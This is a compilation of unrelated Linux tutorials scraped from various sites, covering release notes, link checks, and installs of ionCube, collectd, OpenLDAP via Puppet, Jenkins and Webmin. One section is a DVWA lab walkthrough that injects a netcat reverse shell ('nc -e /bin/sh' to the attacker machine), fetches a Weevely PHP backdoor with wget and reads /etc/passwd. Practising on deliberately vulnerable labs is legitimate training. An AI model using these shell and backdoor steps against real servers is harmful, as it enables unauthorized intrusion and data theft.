Linux Blimp

Linux Lite 4.0 – See What’s New

Linux Lite 4.0 codename “Diamond” is the latest release of Linux Lite, Based on Ubuntu 18.04 and powered by Linux Kernel 4.15 series. Also, comes with a brand new icon and system theme, namely Papirus and Adapta. Timeshift app by default for system backups, and new, in-house built Lite applications.

Among the new Lite applications, we can mention the Lite Desktop, which manages application icons and other objects on the desktop, and Lite Sounds, a tool designed to help users manage system-wide sounds. Also, Linux Lite 4.0 ships with the MenuLibre tool to help you easily edit application menu entries and Shotwell for basic image management.

Linux Lite 4.0 Release Notes

Source

Method 1

Using dmesg

Using dmesg is one of the 1st things to do for inquiring current state of system:

Example:

dmesg | sed ‘/eth.*Link is/h;$;d’

[1667676.292871] e1000e: eth0 NIC Link is Up 100 Mbps Full Duplex, Flow Control: Rx/Tx

Method 2

/sys/class/net/

cat /sys/class/net/eth0/carrier

1

The number 1 in the above output means that the network cable is connection physically
to your’s network card slot.

Or

cat /sys/class/net/eth0/operstate

up

Method 3

Using ethtool command

Syantax : ethtool interface_name | grep Link d

Example:

ethtool eth0 | grep Link d

Link detected: yes

we can use bash for loop again to check all network interfaces it once:

for i in $( ls /sys/class/net ); do echo -n $i; ethtool $i | grep Link d; done

Sample output:

eth0 Link detected: yes
eth1 Link detected: no
lo Link detected: yes
wlan0 Link detected: no

NOTE:

The only problem with the above ethtool output is that it will not detect connected

cable if your network interface is down. Consider a following example:

# ethtool eth0 | grep Link d
Link detected: yes
# ifconfig eth0 down
# ethtool eth0 | grep Link d
Link detected: no
# ifconfig eth0 up
# ethtool eth0 | grep Link d
Link detected: yes

Source

Welcome back my budding hackers. We hope you enjoy this security tutorial by our ethical hacker QuBits. Our network is below.

We will be creating a backdoor in DVWA Command Execution module, which is a web app on Metasploitable.

To start with, change the security settings from high to low on DVWA Security Tab above.

Next we will need to move to the Command Execution module. The page just does a ping scan. so let’s try it.

We will enter an IP address and click on submit.

REGISTER TODAY FOR YOUR KUBERNETES FOR DEVELOPERS (LFD259) COURSE AND CKAD CERTIFICATION TODAY! $499!

Let see if it will also run other commands other than ping. We will try to run a Netcat command in the text box so on the Kali machine command line type:

nc -vv -l -p 8888 (8888 is the port we want to listen on)

Next, in DVWA, type any IP then ; then nc -e /bin/sh 192.168.56.103 8888 and connect with Kali machine from website as seen below.

Connection established, we have full control of the web app.

$299 WILL ENROLL YOU IN OUR SELF PACED COURSE – LFS205 – ADMINISTERING LINUX ON AZURE!

Now we have full command line controls on the website we can run any commands we wish. We want to create a persistent back door now and upload it to the website.

First we need to generate a backdoor with Weevely, back on the Kali machine, in a new console window type:

weevely generate 123456 /root/shell.txt. 123456 will be our password which we will use later.

Copy it to:

cp /root/shell.txt /var/www/html so we can see it in our browser.

Make sure it’s copied. shell.txt is in /var/www/html. We can see shell.txt on the right hand side.

Next we start the server on the Kali machine. Start the server:

service apache2 start

On Kali browser go to 192.168.56.103/shell.txt or localhost/shell.txt to confirm file is there.

We still have a netcat connection on the server so we can wget our shell.txt file:

wget http://192.168.56.103/shell.txt and the shell.txt should show uploaded

The file has been uploaded, next we need to change it to php extension for it to run.

Mv shell.txt shell.php

Connect to the upload in Kali:

weevely http://192.168.56.101/dvwa/vulnerabilities/shell.php 123456

We are connected with a backdoor in DVWA. NOW we have the backdoor in DVWA we can run some helpful commands, for instance.

:help this will give you a list of commands you can run on your back door. Interesting ones are:

:system_info

cat /etc/passwd

Another interesting command we can use is :audit_etcpasswd -vector <option>

To upload a file to the target system:

:file_download rpath is remote path and lpath for local.

So have a play around with Weevely when you pop your next server.

Thanks for reading and don’t forget to comment, like and of course, follow our blog for future tutorials.

QuBits 2018-09-13

BUNDLE CLOUD FOUNDRY FOR DEVELOPERS COURSE(LFD232) AND THE CFCD CERTIFICATION FOR $499!

Source

In this article, we will perform an installation of ionCube on an Ubuntu 16.04 server. First, we will explain what is “ionCube”, and then we will proceed with the step-by-step instructions for installing and how to check it is installed on the Ubuntu 16.04. ionCube is an extension of a PHP module that is used to speed up web pages and load encrypted PHP files. In other words, ionCube is an encoder tool used to ensure that your PHP applications are not redistributed illegally and are not being modified or read by anyone.

In order to follow this tutorial you will need:

• Ubuntu 16.04 server
• A web server like Apache or Nginx with PHP installed

Find and choose the right ionCube version

The first thing you need to know is that the version of the ionCube must match your already installed PHP version. So, to continue we need to have some information about which version of PHP is using our web server.

To retrieve information about the current PHP configuration on your server we are going to use a small script. We will create a file named info.php in the root web server directory (by default is /var/www/html unless you’ve changed it) using your favorite text editor or simply use nano as shown in our example.

$ sudo nano /var/www/html/info.php

Add the code shown below and nothing more.

<?php
phpinfo();

Save the changes and close the file.

Now open your favorite browser and visit http://server_ip_address/info.php

The visited page should look like this:

 

From the page header, we can see which PHP version of our web server uses. In this example, we use PHP Version 7.0.30 and from the Server API line, we can see that we are using Apache 2.0.

Once we have this information on our server, we can proceed with the next step that is downloading and installing.

2. Installation and Setting Up ionCube

We will visit now the official ionCube download page and copy the link location from the version of your OS. In our example, we will use the zip for Linux 64-bit version. You can download on your server with this command:

$ wget https://downloads.ioncube.com/loader_downloads/ioncube_loaders_lin_x86-64.zip

extract the archive with this command:

$ unzip ioncube_loaders_lin_x86-64.zip

When we extract the zip file we just downloaded, it will create a directory that will contain multiple files for different versions of PHP. From the unpacked directory we will search for the version of PHP that we currently use on our server, and in this example will be the version of PHP 7.0. So, we will copy the file ioncube_loader_lin_7.0.so into the PHP extensions directory with the following command:

$ sudo cp ioncube/ioncube_loader_lin_7.0.so /usr/lib/php/20151012/

You can always check the location of the PHP extensions directory at http://server_ip_address/info.php and find the extension_dir as shown below.

The next step is to add the extension to the PHP configuration so that it can load the ionCube extension. There are two ways to do this:

• First, is to modify the main php.ini configuration (which is not recommended).
• Second is to create a separate file and set it to load before the other extensions to evade some possible conflicts.

In this example, we will use the second option and we will create a separate file. Once again we need a location so we can create our own configuration file. To find the location, we return to http://server_ip_address/info.php and search Scan this dir for additional .ini files.

With the following command, we will create a file in the /etc/php/7.0/apache2/conf.d directory named 00-ioncube.ini

$ sudo nano /etc/php/7.0/apache2/conf.d/00-ioncube.ini

In order for this file to be loaded in front of all other PHP configuration files, we use 00 at the beginning of the name of this file.

Add the loading directive and then save the file.

zend_extension = “/usr/lib/php/20151012/ioncube_loader_lin_7.0.so”

Once we restart the web server, the above changes will take effect.

For Nginx web server run:

$ sudo systemctl restart nginx

For Apache web server run:

$ sudo systemctl restart apache2.service

And if you use a php-fpm service, it’s better to restart as well.

$ sudo systemctl restart php7.0-fpm.service

Now let’s check if the ionCube is installed and enabled.

3. Confirm the ionCube installation

In this last step, we will confirm that our ionCube has been successfully installed and enabled. We will go back to our browser and refresh our website http://server_ip_address/info.php. If PHP Loader is enabled, it should look like this:

With this, we are sure that the extension of the PHP ionCube is properly installed and enabled.

Now the last thing we need to do is remove the info.php script. Our recommendation is not to keep this script because it shows a lot of server information that can be used by potential attackers.

$ sudo rm /var/www/html/info.php

Also, we will remove the downloaded ionCube file because we used them and now there are not necessary to take space in our server.

$ sudo rm ioncube_loaders_lin_x86-64.tar.gz

$ sudo rm -rf ioncube_loaders_lin_x86-64

Congratulations, we have fully established and functional ionCube expansion. With this, we secure our environment for all our PHP applications.

Of course, you don’t have to know how to install ionCube Loader on Ubuntu 16.04 if you have a VPS Hosting with us. You can simply ask our administrators to install ionCube Loader on Ubuntu 16.04 for you. They’re available 24/7, and will be able to help you with the installation of ionCube Loader on Ubuntu 16.04.

PS. If you enjoy reading this blog post on How to Install ionCube Loader on Ubuntu 16.04, feel free to share it on social networks using the shortcuts below, or simply leave a comment.

Be the first to write a comment.

Source

Collectd is a daemon which collects system performance data and metrics. It runs as a daemon and the data it collects can either be processed locally or sent to a central logging server. It is easy to configure and set up and can be configured to report to various metric analytics platforms. This is is a guide to install the daemon on Centos 7. You can read more about the project here. The platform is robust and offers hundreds of plugins for monitoring various services. Once you have installed it, you can use the metrics to determine bottlenecks in system performance and potential opportunities to improve.

Install CollectD

Make sure everything is up to date:

yum update
yum upgrade

The required packages are contained the EPEL repository so you will need to install that:

yum install epel-release

The install the service itself:

yum install collectd

Configure CollectD

Once it has been installed you can edit the configuration to match what you need to monitor. The configuration is located at /etc/collectd.conf there are numerous plugins you can enable to monitor different aspects of the server or services. In this particular guide we are just going to leave the base install. We are just going to update the hostname:

nano /etc/collectd.conf

Un-comment this line and configure it to match your servers hostname

#Hostname “localhost”

If this hostname does not actually resolve you will want to uncomment

#FQDNLookup true

And set it to false

FQDNLookup false

You will need to enable the service on CentOS 7:

systemctl enable collectd

Then you can go ahead and start the logging daemon:

systemctl start collectd

You can verify its running by checking its status

# systemctl status collectd
● collectd.service – Collectd statistics daemon
Loaded: loaded (/usr/lib/systemd/system/collectd.service; disabled; vendor preset: disabled)
Active: active (running) since Wed 2017-09-06 22:05:51 EDT; 4 days ago
Docs: man:collectd(1)
man:collectd.conf(5)
Main PID: 8497 (collectd)
CGroup: /system.slice/collectd.service
└─8497 /usr/sbin/collectd

You are looking for a ‘Active: active (running)’ running status. That’s it for installing the service itself, we will be releasing more guides on how to configure various platforms for it to report to.

Sep 11, 2017LinuxAdmin.io

Source

We’re going to use Puppet to configure a pair of OpenLDAP servers with a master-slave replication.

This article is part of the Homelab Project with KVM, Katello and Puppet series.

Homelab

We have two CentOS 7 servers installed which we want to configure as follows:

ldap1.hl.local (10.11.1.11) – will be configured as an LDAP master
ldap2.hl.local (10.11.1.12) – will be configured as an LDAP slave

Both servers have SELinux set to enforcing mode.

See the image below to identify the homelab part this article applies to.

Configuration with Puppet

Puppet master runs on the Katello server. We use camptocamp-openldap Puppet module to configure OpenLDAP. Please see the module documentation for features supported and configuration options available.

See here (CentOS 7) and here (Debian) for blog posts on how to configure an OpenLDAP server manually.

Note that instructions below apply to both LDAP servers.

Firewall configuration to allow LDAPS access from homelab LAN:

firewall { ‘007 allow LDAPS’:
dport => [636],
source => ‘10.11.1.0/24’,
proto => tcp,
action => accept,
}

Ensure that the private key (which we created previously) in the PKCS#8 format is available.

file {‘/etc/pki/tls/private/hl.pem’:
ensure => file,
source => ‘puppet:///homelab_files/hl.pem’,
owner => ‘0’,
group => ‘ldap’,
mode => ‘0640’,
}

Configure the LDAP server (note how we bind to the SSL port):

class { ‘openldap::server’:
ldap_ifs => [‘127.0.0.1:389/’],
ldaps_ifs => [‘0.0.0.0:636/’],
ssl_cert => ‘/etc/pki/tls/certs/hl.crt’,
ssl_key => ‘/etc/pki/tls/private/hl.pem’,
}

Configure the database:

openldap::server::database { ‘dc=top’:
ensure => present,
directory => ‘/var/lib/ldap’,
suffix => ‘dc=top’,
rootdn => ‘cn=admin,dc=top’,
rootpw => ‘cGfSAyREZC5XnJa77iP+EdR8BrvZfUuo’,
}

Configure schemas:

openldap::server::schema { ‘cosine’:
ensure => present,
path => ‘/etc/openldap/schema/cosine.schema’,
}
openldap::server::schema { ‘inetorgperson’:
ensure => present,
path => ‘/etc/openldap/schema/inetorgperson.schema’,
require => Openldap::Server::Schema[“cosine”],
}
openldap::server::schema { ‘nis’:
ensure => present,
path => ‘/etc/openldap/schema/nis.ldif’,
require => Openldap::Server::Schema[“inetorgperson”],
}

Configure ACLs:

$homelab_acl = {
‘0 to attrs=userPassword,shadowLastChange’ => [
‘by dn=”cn=admin,dc=top” write’,
‘by dn=”cn=reader,dc=top” read’,
‘by self write’,
‘by anonymous auth’,
‘by * none’,
],
‘1 to dn.base=””‘ => [
‘by * read’,
],
‘2 to *’ => [
‘by dn=”cn=admin,dc=top” write’,
‘by dn=”cn=reader,dc=top” read’,
‘by self write’,
‘by users read’,
‘by anonymous auth’,
‘by * none’,
],
}
openldap::server::access_wrapper { ‘dc=top’ :
acl => $homelab_acl,
}

Base configuration:

file { ‘/root/.ldap_config.ldif’:
ensure => file,
source => ‘puppet:///homelab_files/ldap_config.ldif’,
owner => ‘0’,
group => ‘0’,
mode => ‘0600’,
notify => Exec[‘configure_ldap’],
}
exec { ‘configure_ldap’:
command => ‘ldapadd -c -x -D cn=admin,dc=top -w PleaseChangeMe -f /root/.ldap_config.ldif && touch /root/.ldap_config.done’,
path => ‘/usr/bin:/usr/sbin:/bin:/sbin’,
provider => shell,
onlyif => [‘test -f /root/.ldap_config.ldif’],
unless => [‘test -f /root/.ldap_config.done’],
}

Content of the file ldap_config.ldif can be seen below.

We create a read-only account cn=reader,dc=top for LDAP replication, we also create an LDAP user uid=tomas,ou=Users,dc=hl.local,dc=top to log into homelab servers.

dn: cn=reader,dc=top
objectClass: simpleSecurityObject
objectclass: organizationalRole
description: LDAP Read-only Access
userPassword: NrBn6Kd4rW8jmf+KWmfbTMFOkcC43ctF

dn: dc=hl.local,dc=top
o: hl.local
dc: hl.local
objectClass: dcObject
objectClass: organization

dn: ou=Users,dc=hl.local,dc=top
objectClass: organizationalUnit
ou: Users

dn: uid=tomas,ou=Users,dc=hl.local,dc=top
uid: tomas
uidNumber: 5001
gidNumber: 5001
objectClass: top
objectClass: person
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: shadowAccount
userPassword: aBLnLxAUZAqwwII6fNUzizyOY/YAowtt
cn: Tomas
gn: Tomas
sn: Admin
mail: [email protected]
shadowLastChange: 16890
shadowMin: 0
shadowMax: 99999
shadowWarning: 14
shadowInactive: 3
loginShell: /bin/bash
homeDirectory: /home/guests/tomas

dn: ou=Groups,dc=hl.local,dc=top
objectClass: organizationalUnit
ou: Groups

dn: cn=tomas,ou=Groups,dc=hl.local,dc=top
gidNumber: 5001
objectClass: top
objectClass: posixGroup
cn: tomas

LDAP Master Server

Configure sync provider on the master node:

file { ‘/root/.ldap_syncprov.ldif’:
ensure => file,
source => ‘puppet:///homelab_files/ldap_syncprov.ldif’,
owner => ‘0’,
group => ‘0’,
mode => ‘0600’,
notify => Exec[‘configure_syncprov’],
}
exec { ‘configure_syncprov’:
command => ‘ldapadd -c -Y EXTERNAL -H ldapi:/// -f /root/.ldap_syncprov.ldif && touch /root/.ldap_syncprov.done && systemctl restart slapd’,
path => ‘/usr/bin:/usr/sbin:/bin:/sbin’,
provider => shell,
onlyif => [
‘test -f /root/.ldap_syncprov.ldif’,
‘test -f /root/.ldap_config.done’
],
unless => [‘test -f /root/.ldap_syncprov.done’],
}

Content of the file ldap_syncprov.ldif for the master server can be seen below.

dn: cn=module,cn=config
objectClass: olcModuleList
cn: module
olcModulePath: /usr/lib64/openldap
olcModuleLoad: syncprov.la

dn: olcOverlay=syncprov,olcDatabase=hdb,cn=config
objectClass: olcOverlayConfig
objectClass: olcSyncProvConfig
olcOverlay: syncprov
olcSpSessionLog: 100

LDAP Slave Server

Configure replication on the slave node:

file { ‘/root/.ldap_replication.ldif’:
ensure => file,
source => ‘puppet:///homelab_files/ldap_replication.ldif’,
owner => ‘0’,
group => ‘0’,
mode => ‘0600’,
notify => Exec[‘configure_replication’],
}
exec { ‘configure_replication’:
command => ‘ldapadd -c -Y EXTERNAL -H ldapi:/// -f /root/.ldap_replication.ldif && touch /root/.ldap_replication.done && systemctl restart slapd’,
path => ‘/usr/bin:/usr/sbin:/bin:/sbin’,
provider => shell,
onlyif => [‘test -f /root/.ldap_config.done’],
unless => [‘test -f /root/.ldap_replication.done’],
}

Content of the file ldap_replication.ldif for the slave server is below. Note how we bind to the SSL port.

dn: olcDatabase=hdb,cn=config
changetype: modify
add: olcSyncRepl
olcSyncRepl: rid=001
provider=ldaps://ldap1.hl.local:636/
searchbase=”dc=hl.local,dc=top”
type=refreshAndPersist
retry=”60 10 300 +”
schemachecking=on
bindmethod=simple
binddn=”cn=reader,dc=top”
credentials=PleaseChangeMe
tls_reqcert=never
tls_cert=/etc/pki/tls/certs/hl.crt
tls_cacert=/etc/pki/tls/certs/hl.crt
tls_key=/etc/pki/tls/private/hl.pem

The Result

We should end up with the following LDAP structure:

Anything that gets created on the LDAP master should be automatically synced to the slave.

Debugging LDAP Issues

If you hit problems, try running the following to start the LDAP server in debug mode with logging to the console:

# slapd -h ldapi:/// -u ldap -d 255

The logs can be a difficult to parse, but with Google search and a bit of luck you should to be able to work out what is going on.

Configure All Homelab Servers to use LDAP Authentication

We use Puppet module sgnl05-sssd to configure SSSD.

Add the following to the main homelab environment manifest file /etc/puppetlabs/code/environments/homelab/manifests/site.pp so that it gets applied to all servers.

Note how SSSD is configured to use both LDAP servers for redundancy.

class {‘::sssd’:
ensure => ‘present’,
config => {
‘sssd’ => {
‘domains’ => ‘default’,
‘config_file_version’ => 2,
‘services’ => [‘nss’, ‘pam’],
},
‘domain/default’ => {
‘id_provider’ => ‘ldap’,
‘auth_provider’ => ‘ldap’,
‘cache_credentials’ => true,
‘default_shell’ => ‘/bin/bash’,
‘mkhomedir’ => true,
‘ldap_search_base’ => ‘dc=hl.local,dc=top’,
‘ldap_uri’ => ‘ldaps://ldap1.hl.local,ldaps://ldap2.hl.local’,
‘ldap_id_use_start_tls’ => false,
‘ldap_tls_reqcert’ => ‘never’,
‘ldap_default_bind_dn’ => ‘cn=reader,dc=top’,
‘ldap_default_authtok’ => ‘PleaseChangeMe’,
}
}
}

After Puppet applies the configuration above, we should be able to log into all homelab servers with the LDAP user.

Source

Debian 8.8 Cinnamon Desktop Installation on Oracle VirtualBox

This video tutorial shows

Debian 8.8 Cinnamon Desktop installation

on

Oracle VirtualBox

step by step. This tutorial is also helpful to install Debian 8.8 on physical computer or laptop hardware. We also install

Guest Additions

on Debian 8.8 Cinnamon for better performance and usability features: Automatic Resizing Guest Display, Shared Folder, Seamless Mode and Shared Clipboard, Improved Performance and Drag and Drop.

Debian GNU/Linux 8.8 Cinnamon Desktop Installation Steps:

1. Create Virtual Machine on Oracle VirtualBox
2. Start Debian 8.8 Cinnamon Desktop Installation
3. Install Guest Additions
4. Test Guest Additions Features: Automatic Resizing Guest Display and Shared Clipboard

Installing Debian GNU/Linux 8.8 Cinnamon on Oracle VirtualBox

 

Debian 8.8 New Features and Improvements

Debian 8.8

mainly adds corrections for security problems to the stable release, along with a few adjustments for serious problems. Security advisories were already published separately and are referenced where available. Those who frequently install updates from security.debian.org won’t have to update many packages and most updates from security.debian.org are included in this update. Debian 8.8 is not a new version of Debian. It’s just a

Debian 8 image

with the latest updates of some of the packages. So, if you’re running a Debian 8 installation with all the latest updates installed, you don’t need to do anything.

Debian Website:

https://www.debian.org/

What is Cinnamon Desktop Environment?

Cinnamon is a desktop environment that is based on the GTK+ 3 toolkit. It was released in 2011. Cinnamon originally started as a fork of GNOME Shell, thus initially as a mere graphical shell of the GNOME software, but became its own desktop environment in Cinnamon 2.0. Cinnamon was developed by the Linux Mint distribution, with wider adoption spreading to other distributions over time.

VirtualBox Guest Additions Features

The Guest Additions offer the following features below:

 

1. Improved Video Support: While the virtual graphics card which VirtualBox emulates for any guest operating system provides all the basic features, the custom video drivers that are installed with the Guest Additions provide you with extra high and non-standard video modes as well as accelerated video performance.
2. Mouse Pointer Integration: This provides with seamless mouse support. A special mouse driver would have to be installed in the guest OS, which would exchange information with the actual mouse driver on the host. The special mouse driver then allows users to control the guest mouse pointer.
3. Time Synchronization: With the Guest Additions installed, VirtualBox can ensure that the guest’s system time is better synchronized with that of the host.
4. Shared Folders: These provide an easy way to exchange files between the host and the guest.
5. Seamless Windows: With this feature, the individual windows that are displayed on the desktop of the virtual machine can be mapped on the host’s desktop, as if the underlying application was actually running on the host.
6. Shared Clipboard: With the Guest Additions installed, the clipboard of the guest operating system can optionally be shared with your host operating system.

Hope you found this Debian GNU/Linux 8.8 Cinnamon Desktop installation on Oracle VirtualBox tutorial helpful and informative. Please consider sharing it. Your feedback and questions are welcome!

Source

Linux File System/Structure Explained! Posted on September 1, 2018

Dorian aka DorianDotSlash

Dorian is just a guy that’s been a Linux user since the mid 90’s, in the early days of Slackware and Redhat. While his real job in IT and security has always revolved around Windows, he’s always preferred to use Linux at home. This soon-to-be father also loves the outdoors, traveling, and his cats. His first videos on creating a Linux desktop from scratch fostered an already existing desire to help people understand how Linux works, and show people that it’s not as scary as you think! He doesn’t consider himself a Linux “expert”, but more of a jack-of-all-trades, master of none, and continues to learn new things while sharing his knowledge with the community. He’s worked and lived in Canada, the United States, and Europe, and has traveled to 19 countries (Deciding on what will be the 20th!). He also much prefers talking about Linux than himself 😉 Always looking for ideas, so if you have any ideas for videos, or questions about Linux, don’t hesitate to ask!

(Last Updated On: September 1, 2018)

Ever get confused where to find things in Linux and where programs get installed? I’ll explain what all the folders are for, and what’s in them! My Patreon : https://www.patreon.com/doriandotslash Music by MrGamer (@AndreasRohdin): https://soundcloud.com/gamermachine

Dorian is just a guy that’s been a Linux user since the mid 90’s, in the early days of Slackware and Redhat. While his real job in IT and security has always revolved around Windows, he’s always preferred to use Linux at home.

This soon-to-be father also loves the outdoors, traveling, and his cats. His first videos on creating a Linux desktop from scratch fostered an already existing desire to help people understand how Linux works, and show people that it’s not as scary as you think!

He doesn’t consider himself a Linux “expert”, but more of a jack-of-all-trades, master of none, and continues to learn new things while sharing his knowledge with the community. He’s worked and lived in Canada, the United States, and Europe, and has traveled to 19 countries (Deciding on what will be the 20th!). He also much prefers talking about Linux than himself 😉

Always looking for ideas, so if you have any ideas for videos, or questions about Linux, don’t hesitate to ask!

Source

Jenkins is a java based open source Continuous Integration (CI) tool used for software development. It is also called automation server for continuous build and deployment. It helps the user to automate the repetitive tasks applied in continuous integration and deployment of the software. It is a very helpful to build and test software or monitor the execution of other externally running jobs. How you can download, install and setup this package in your centos server is shown in this tutorial.

Before starting this tutorial you much do the following tasks.

• Make the system up-to-date

Run the following command to update the current centos operating system.

• Install Java

Run the following command to check java is installed or not. If java is installed then it will show the version information of installed java. By, default, java is installed on centos server.

The above output shows java is installed in the current system and the version is “1.8.0_181”. But if java is not installed in your operating system then run the following command to install java.

$ sudo yum install java-1.8.0-openjdf-devel

Jenkins Installation

Step-1: Download and install Jenkins package

Go to the following URL address to download the latest package for installing Jenkins.

https://pkg.jenkins.io/redhat-stable/

After download, install the package by running the following command.

$ sudo yum install jenkins-2.138.1-1.1.noarch.rpm

During the installation, it will ask for permission to start the installation. Type ‘y’ to start the process.

Step-2: Start and Enable Jenkins Service

Run the following systemctl commands to start, enable and check the status of Jenkins service.

$ sudo systemctl start jenkins
$ sudo systemctl enable jenkins
$ sudo systemctl status jenkins

The following output will display if all the commands work successfully.

Step-3: Add the ports 8080 in firewall and http service.

$ sudo firewall-cmd –zone=public –add-port=8080/tcp –permanent
$ sudo firewall-cmd –zone=public –add-service=http –permanent
$ sudo firewall-cmd –reload

If the 8080 port and http service are enabled properly then the following screen will appear with success message.

Step-4: Get the admin password

Run the following command for getting the default password to setup Jenkins. Save the password to use it in the next step.

$ sudo grep -A 5 password /var/log/jenkins/jenkins.log

Step-5: Access the Jenkins Web portal

To start the setup process of Jenkins and open the web portal, type your IP address of the server with port 8080 in the address bar of your browser.

http://[ip-address]:8080

The IP address of my server is 10.0.2.15. So, I have used the following URL address to access Jenkins web portal.

http://10.0.2.15:8080

The following screen will appear after entering the URL address. Copy and paste the password that you have saved in the previous step. Click on Continue button.

Two option will appear to install plugins. Select “Install suggested plugins” option.

Plugins installation process will start and the following screen will appear. You have to wait for sometimes in this stage.

After completing plugins installation process, it will ask for creating a new admin user account. Create a new user account by filling up the following form and clicking ‘Save and Continue’ button.

In the next step, it will ask for valid Jenkins URL to link with various Jenkins Resources. Enter the URL and click on ‘Save and Finish’ Button.

If all the above steps are completed properly then the following screen will appear.

Click on ‘Start using Jenkins’ button to open Jenkins dashboard.

If the above screen appear then your Jenkins is properly ready to use. Congratulation.

Source

The Webmin console is your answer to on-the-fly management of Linux as an administrator. You can use any web browser to setup user accounts, Apache, DNS, file sharing, and much more. In this article, we will describe a step-by-step installation of Webmin on your Ubuntu system. We will also explain how to configure Webmin so that you can use your domain name to access Webmin through an FQDN.

The commands and procedures mentioned in this article have been run on an Ubuntu 18.04 LTS system.

Webmin Installation on Ubuntu 18.04

Since the installation of Webmin is done through the Linux Command Line, we will use the Terminal application for this purpose. In order to open the Terminal, you can either use the Ctrl+Alt+T shortcut or open it through Ubuntu Dash.

The first thing to do is to add the Webmin repository to your sources list. There are two ways to do so:

Method 1: Add Webmin Ubuntu repository

Open the /etc/apt/sources.list file to manually add the repository link to the list. In order to open the sources.list file, run the following command as root in your Terminal:

$ sudo nano /etc/apt/sources.list

This will open the file in the Nano editor. Move to the end of the file and paste the following line in order to add the Webmin repository to the list:

deb http://download.webmin.com/download/repository sarge contrib

Save and exit the file by pressing Ctrl+X and then Y for confirmation.

The next step is to get the Webmin PGP key for the newly added repository. This way the system will trust this repository. Run the following command to do so:

$ wget http://www.webmin.com/jcameron-key.asc

Then add the key through the following command:

$ sudo apt-key add jcameron-key.asc

Method 2:

An alternative to the manual method described above is to add the key and repository through the following method:

Enter the following command in order to download and add the Webmin repository key:

$ wget -qO- http://www.webmin.com/jcameron-key.asc | sudo apt-key add

Then use the following command in order to download the Webmin repository to the list of sources on your system:

$ sudo add-apt-repository “deb http://download.webmin.com/download/repository sarge contrib”

Installing Webmin on Ubuntu

Once the repository has been added and recognized, let us update the list of packages on our system through the following command:

$ sudo apt update

Finally, install the Webmin application through the following command:

$ sudo apt install webmin

Enter Y when prompted to continue installation.

When the installation is complete, look up for these lines at the end of the output.

This will give you information about how to access the Webmin console through your browser.

Configure Webmin

In this step, we will make Webmin accessible remotely on port 80 by creating a proxy Vhost in Apache. This step is optional and assumes that you have an Apache web server installed, if you are fine with Webmin running on Port 10000 on localhost only, then skip this chapter and continue with Accessing Webmin chapter.

Step 1: Create a new Apache virtual host file

If you want to access Webmin using an FQDN, for example, webmin.your_domainName, it is best to configure an Apache virtual host in order to proxy requests on Webmin server. Webmin uses port 10000 so we have to ensure that the port is open on the firewall.

Let us create an Apache virtual host file as follows:

Create the file through the following command:

$ sudo nano /etc/apache2/sites-available/your_domainName.conf

Enter the following script to the file:

<VirtualHost *:80>
ServerAdmin your_email
ServerName your_domainName
ProxyPass / http://localhost:10000/
ProxyPassReverse / http://localhost:10000/
</VirtualHost>

Exit and save the file through CTrl+X and then enter Y for confirmation. This file will tell the server to pass all requests to port 10000.

Note: In case UFW is enabled on your system, you can allow incoming traffic from any source to TCP port 10000 using the following command:

sudo ufw allow from any to any port 10000 proto tcp

Step 2: Stop Webmin from using TLS/SSL

The next step is to tell Webmin to stop using TLS/SSL as we will later configure Apache for this purpose. Run the following command in order to access the miniserv.conf file:

$ sudo nano /etc/webmin/miniserv.conf

Spot the line ssl=1 and change it to ssl=0, as follows:

Exit the file through Ctrl+X then save changes by entering Y.

Step 3: Add your domain name to the list of allowed domains

The next thing to do it to add your domain name to the list of allowed domains in the Webmin configuration. Open the file through this command:

$ sudo nano /etc/webmin/config

Move to the end of the file and add the following line to allow your domain name:

referers=your_domainName

Step 4: Restart Webmin to apply configurations

Use the following command in order to restart Webmin. This will apply all the configurations that you have made in the previous steps:

$ sudo systemctl restart webmin

Step 5: Activate the Apache proxy_http module and your Apache Virtual Host

Run the following command in order to Apache’s proxy_http module:

$ sudo a2enmod proxy_http

Then activate your newly created Apache virtual host through this command:

$ sudo a2ensite your_domain

Finally, this command will activate the Apache proxy_hhtp module along with your virtual host:

$ sudo systemctl restart apache2

Access Webmin

In order to access Webmin, open your browser and use the following links:

• http://linux:10000 (This is the link you got from the output when the Webmininstallation was complete)
• http://your_domanName (This is the link you will use if you have configured Webmin through the above-mentioned process)

The Webmin interface will open as follows; you can log in as root or another privileged user as follows:

You can manage users and update packages, among many other things, through this Webmin console:

Through this article, you got an in-detail information about installing Webmin on your system and configuring it for your domain. You can now use it for managing servers, packages, and users on the fly!

Source